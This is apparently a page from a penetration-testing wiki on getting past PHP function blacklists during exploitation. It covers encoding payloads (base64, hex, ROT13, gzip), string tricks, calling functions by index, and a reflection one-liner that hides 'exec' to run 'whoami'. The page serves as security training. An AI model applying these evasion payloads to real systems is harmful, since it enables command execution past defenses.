Exploitation

Blacklist bypass

Encoding the payload

If the blacklist does not allow to perform dangerous functions like Exec in PHP you can try to accordingly encode your payload:

Sample functions for obfuscation

# classic base64
base64_encode("secret"); // "c2VjcmV0"
base64_decode("c2VjcmV0"); // "secret"

# hex
bin2hex("ABC"); // "414243"
hex2bin("414243"); // "ABC"

# other functions
strrev() # reverse the String
str_repeat("a", 5); # "aaaaa"
str_rot13() # shifts each letter 13 places in the alphabet (ROT13).

gzencode() # encodes by gzip (binary)
gzdecode() # decodes by gzip (binary)

Alternate strings

Use string modification to bypass the restrictions:

str_replace() # replaces the letters in string
strip_tags() # removes the tags from the string

Predefined functions

Similar to the template injection exploitation in python we can use the predefined functions.

Example in PHP can be found below:

echo get_defined_functions()["internal"][6]("hello world");

We should aim for Exec or other dangerous functions.

Reflection

Typically reflection is a way for developers to modify application at the runtime by appending the program codes.

(new ReflectionFunction(urldecode('%65%78%65%63')))->invoke('whoami'); 
# %65%78%65%63 = exec

Of course during exploitation you can use different encodings listed above.

PreviousDangerous Functions NextPath Traversal

Last updated 3 months ago